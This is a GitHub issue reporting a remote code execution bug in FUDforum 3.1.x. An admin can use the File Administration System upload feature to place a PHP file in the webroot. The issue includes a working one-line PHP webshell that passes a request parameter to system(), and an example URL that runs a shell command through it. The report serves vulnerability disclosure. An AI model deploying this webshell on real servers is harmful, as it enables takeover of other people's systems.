Skip to content

Remote code execution bug #23

Closed as not planned
Closed as not planned
@SonNguyen3496

Description

Remote code execution with File Administration System feature in Admin Control Panel Site

Affected Version- 3.1.0

Demo installation: https://localhost/FUDforum-3.1.2/

Steps to reproduce the bug:
1 : go to http://localhost/FUDforum-3.1.2/ and login with admin account

Screenshot 2022-05-15 at 18 25 26

2 : go to Admin Control panel and access to http://localhost/FUDforum-3.1.2/adm/admbrowse.php?&SQ=59a844c7073e3a8d98026d324884a119
Screenshot 2022-05-15 at 18 25 37

3 : Use File to upload Feature in File Administration System to Upload PHP Webshell PHP to Webroot Directory
WebShell payload:<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Screenshot 2022-05-15 at 18 32 58

4 : Access to webshell and get remote execution code.
Example : http://localhost/FUDforum-3.1.2/2test1.php?cmd=ls%20-la
Screenshot 2022-05-15 at 18 32 46

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions